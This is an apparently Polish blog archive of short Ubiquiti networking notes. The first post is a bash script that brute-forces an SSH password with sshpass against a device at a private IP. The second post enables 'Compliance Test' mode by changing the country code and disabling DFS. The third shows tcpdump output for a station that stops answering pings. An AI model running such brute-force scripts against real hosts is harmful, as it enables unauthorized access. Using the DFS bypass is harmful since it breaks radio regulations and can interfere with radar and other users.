Archiwa kategorii: Ubiquiti

Brute force ssh login

apt-get install sshpass

Hasło zawierało 2 cyfry z shiftem oraz 4 stałe znaki

#!/bin/bash
TAB=("!" "@" "#" "$" "%" "^" "&" "*" "(" ")");
for (( i=0; $i <= 9; i++ )) ; do
for (( j=0; $j <= 9; j++ )) ; do
      PSS=${TAB[$i]}${TAB[$j]}"xxxx";
      echo $PSS;
sshpass -p "$PSS" ssh ubnt@10.10.197.77 
done
done

UBNT Compliance Test jak włączyć?

Trzeba zalogować się przez ssh na ubnt@192.168.1.20 i dalej:

touch /etc/persistent/ ct
sed -i 's/radio.1.countrycode=616/radio.1.countrycode=511/g' /tmp/system.cfg
sed -i 's/radio.countrycode=616/radio.countrycode=511/g' /tmp/system.cfg
sed 's/radio.1.dfs.status=.*$/radio.1.dfs.status=disabled/g' -i /tmp/system.cfg
save
reboot

 

 

 

 

 

 

UBNT: Supervisory, Receiver not Ready

Nanostation LOCO M5 jako station, łączy się z AP, ale nie odpowiada na pingi, widać tcpdumpem:

11:19:16.086330 00:15:6d:e6:e4:XX > ff:ff:ff:ff:ff:ff Null Supervisory, Receiver not Ready, rcv seq 64, Flags [Poll], length 46
11:19:16.086346 00:15:6d:e6:e4:XX > ff:ff:ff:ff:ff:ff Null Unnumbered, xid, Flags [Response], length 46: 01 02

Pomaga restart zdalny.